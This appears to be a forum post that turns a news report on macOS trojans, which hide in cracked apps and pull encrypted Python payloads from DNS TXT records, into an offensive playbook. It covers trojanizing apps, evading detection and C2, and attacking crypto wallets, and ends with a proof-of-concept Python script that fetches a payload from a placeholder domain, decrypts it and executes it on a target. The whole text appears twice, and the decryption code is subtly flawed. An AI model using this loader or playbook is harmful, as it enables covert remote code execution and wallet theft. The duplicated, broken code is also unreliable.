Original article: https://www.bleepingcomputer.com/news/se...s-records/
The article discusses a cyberattack campaign targeting macOS Ventura users via cracked apps packaged as PKG files containing a trojan.
It details an infection chain where malware is installed in the /Applications/ folder, masquerading as an app activator.
The malware requests admin privileges and installs Python 3 if necessary, disguising its activity as app patching.
It then contacts a C2 server using a unique URL construction method to fetch a base64-encoded, AES-encrypted Python script via DNS TXT records, evading detection.
This script acts as a downloader for a backdoor that collects system information and modifies system files for persistence.
The attack also targets Bitcoin Core and Exodus wallets, replacing them with backdoored versions to steal wallet credentials.
Detailed bullet points emphasizing key information for offensive security operations:
Infection Vector: Utilization of repackaged cracked applications as trojans.
Privilege Escalation: Leveraging the 'AuthorizationExecuteWithPrivileges' function for elevated access.
Environment Setup: Checking and installing Python 3 for script execution.
C2 Communication: Unique URL generation for DNS TXT record queries to evade traffic analysis.
Payload Delivery: Encoded and encrypted Python script fetched from DNS records.
Backdoor Functionality: Collection of system information and file modifications for persistence.
Targeted Wallet Theft: Replacing Bitcoin and Exodus wallets with compromised versions.
Analyze derived TTPs in-depth, tailored for offensive security:
Trojanized Applications: Create malicious payloads hidden within seemingly legitimate applications. This approach is effective in scenarios where users are likely to bypass security warnings for cracked software.
Dynamic C2 URLs: Generate domain names dynamically for C2 communications, using a combination of hardcoded lists and random strings. This technique reduces the chance of domain blacklisting and aids in evading network-based detection systems.
DNS-based Exfiltration: Utilize DNS queries to fetch encoded and encrypted payloads. Since DNS requests are common and often not closely monitored, this method can be highly effective for stealthy exfiltration or command and control communications.
Python for Malware: Python's versatility and wide availability make it a useful tool for creating cross-platform malware. In environments where Python is not available, incorporating an installation routine can ensure payload execution.
Tool recommendations and example syntax:
PyInstaller: Convert Python scripts into standalone executables. Syntax: pyinstaller --onefile script.py.
dnspython: For DNS queries in Python. Example: import dns.resolver; answers = dns.resolver.query('example.com', 'TXT').
AES Encryption in Python: Use pycryptodome for encrypting payload data. Example: from Crypto.Cipher import AES; cipher = AES.new(key, AES.MODE_CBC); ciphertext = cipher.encrypt(data).
Suggest further research areas in offensive security:
Advanced Evasion Techniques: Research methods to further obfuscate C2 traffic, perhaps using emerging protocols or decentralized networks.
Behavioral Analysis Evasion: Develop techniques to make the malware's behavior less predictable and harder to detect by advanced endpoint protection systems.
Targeted Wallet Attacks: Explore vulnerabilities in other popular wallet applications and develop specific payloads for them.
Proof of Concept: DNS-based Payload Retrieval and Execution
(This is for educational purposes only. It has not been thoroughly tested and needs some actual skill to use offensively. Skiddies look elsewhere. Don't be a dick and don't break the law.)
Objective: Simulate the process of fetching an encrypted payload via DNS TXT records, decrypting it, and executing it on a macOS system. This will mimic the initial stages of the malware infection chain.
Requirements:
Python 3 installed on the target system.
dnspython for DNS queries in Python (pip install dnspython).
pycryptodome for AES encryption/decryption in Python (pip install pycryptodome).
Steps:
Payload Preparation:
Write a simple Python script that acts as a payload. For demonstration, let it just print system information.
Encrypt this script with AES encryption.
DNS TXT Record Setup:
Host the encrypted payload as a DNS TXT record. You can use a DNS management tool or a service that allows custom TXT records.
Split the encrypted payload into multiple TXT records if it's too large for a single record.
Fetching and Executing the Payload:
Write a Python script on the attacker's machine that queries the DNS TXT records, concatenates them, decrypts the payload, and executes it.
Sample Code:
Payload Script (payload.py):
Encrypt this script using AES (you can use an online tool or write a script for this). Let's assume the encrypted data is stored in a DNS TXT record.
Malware Fetch & Execute Script (fetch_execute.py):
Execution:
Run fetch_execute.py on the target macOS system.
It will fetch, decrypt, and execute the payload script, displaying system information.
Sorry for the stream of consciousness; thought this was a really cool setup
The article discusses a cyberattack campaign targeting macOS Ventura users via cracked apps packaged as PKG files containing a trojan.
It details an infection chain where malware is installed in the /Applications/ folder, masquerading as an app activator.
The malware requests admin privileges and installs Python 3 if necessary, disguising its activity as app patching.
It then contacts a C2 server using a unique URL construction method to fetch a base64-encoded, AES-encrypted Python script via DNS TXT records, evading detection.
This script acts as a downloader for a backdoor that collects system information and modifies system files for persistence.
The attack also targets Bitcoin Core and Exodus wallets, replacing them with backdoored versions to steal wallet credentials.
Detailed bullet points emphasizing key information for offensive security operations:
Infection Vector: Utilization of repackaged cracked applications as trojans.
Privilege Escalation: Leveraging the 'AuthorizationExecuteWithPrivileges' function for elevated access.
Environment Setup: Checking and installing Python 3 for script execution.
C2 Communication: Unique URL generation for DNS TXT record queries to evade traffic analysis.
Payload Delivery: Encoded and encrypted Python script fetched from DNS records.
Backdoor Functionality: Collection of system information and file modifications for persistence.
Targeted Wallet Theft: Replacing Bitcoin and Exodus wallets with compromised versions.
Analyze derived TTPs in-depth, tailored for offensive security:
Trojanized Applications: Create malicious payloads hidden within seemingly legitimate applications. This approach is effective in scenarios where users are likely to bypass security warnings for cracked software.
Dynamic C2 URLs: Generate domain names dynamically for C2 communications, using a combination of hardcoded lists and random strings. This technique reduces the chance of domain blacklisting and aids in evading network-based detection systems.
DNS-based Exfiltration: Utilize DNS queries to fetch encoded and encrypted payloads. Since DNS requests are common and often not closely monitored, this method can be highly effective for stealthy exfiltration or command and control communications.
Python for Malware: Python's versatility and wide availability make it a useful tool for creating cross-platform malware. In environments where Python is not available, incorporating an installation routine can ensure payload execution.
Tool recommendations and example syntax:
PyInstaller: Convert Python scripts into standalone executables. Syntax: pyinstaller --onefile script.py.
dnspython: For DNS queries in Python. Example: import dns.resolver; answers = dns.resolver.query('example.com', 'TXT').
AES Encryption in Python: Use pycryptodome for encrypting payload data. Example: from Crypto.Cipher import AES; cipher = AES.new(key, AES.MODE_CBC); ciphertext = cipher.encrypt(data).
Suggest further research areas in offensive security:
Advanced Evasion Techniques: Research methods to further obfuscate C2 traffic, perhaps using emerging protocols or decentralized networks.
Behavioral Analysis Evasion: Develop techniques to make the malware's behavior less predictable and harder to detect by advanced endpoint protection systems.
Targeted Wallet Attacks: Explore vulnerabilities in other popular wallet applications and develop specific payloads for them.
Proof of Concept: DNS-based Payload Retrieval and Execution
(This is for educational purposes only. It has not been thoroughly tested and needs some actual skill to use offensively. Skiddies look elsewhere. Don't be a dick and don't break the law.)
Objective: Simulate the process of fetching an encrypted payload via DNS TXT records, decrypting it, and executing it on a macOS system. This will mimic the initial stages of the malware infection chain.
Requirements:
Python 3 installed on the target system.
dnspython for DNS queries in Python (pip install dnspython).
pycryptodome for AES encryption/decryption in Python (pip install pycryptodome).
Steps:
Payload Preparation:
Write a simple Python script that acts as a payload. For demonstration, let it just print system information.
Encrypt this script with AES encryption.
DNS TXT Record Setup:
Host the encrypted payload as a DNS TXT record. You can use a DNS management tool or a service that allows custom TXT records.
Split the encrypted payload into multiple TXT records if it's too large for a single record.
Fetching and Executing the Payload:
Write a Python script on the attacker's machine that queries the DNS TXT records, concatenates them, decrypts the payload, and executes it.
Sample Code:
Payload Script (payload.py):
import os
print("System Information:")
os.system("system_profiler SPSoftwareDataType")Encrypt this script using AES (you can use an online tool or write a script for this). Let's assume the encrypted data is stored in a DNS TXT record.
Malware Fetch & Execute Script (fetch_execute.py):
import dns.resolver
from Crypto.Cipher import AES
import base64
import subprocess
import sys
# DNS query to fetch the encrypted payload
def fetch_payload(domain):
try:
answers = dns.resolver.query(domain, 'TXT')
payload_data = "".join([str(rdata) for rdata in answers])
return payload_data
except Exception as e:
print(f"Error fetching payload: {e}")
sys.exit(1)
# Decrypt the payload
def decrypt_payload(encrypted_payload, key):
try:
cipher = AES.new(base64.b64decode(key), AES.MODE_CBC)
decrypted_payload = cipher.decrypt(base64.b64decode(encrypted_payload))
return decrypted_payload
except Exception as e:
print(f"Error decrypting payload: {e}")
sys.exit(1)
# Main function
if __name__ == "__main__":
domain = "example.com" # Replace with the actual domain
encryption_key = "your_base64_encoded_key_here" # Replace with your key
encrypted_payload = fetch_payload(domain)
decrypted_payload = decrypt_payload(encrypted_payload, encryption_key)
# Execute the decrypted payload
exec(decrypted_payload)Execution:
Run fetch_execute.py on the target macOS system.
It will fetch, decrypt, and execute the payload script, displaying system information.
Sorry for the stream of consciousness; thought this was a really cool setup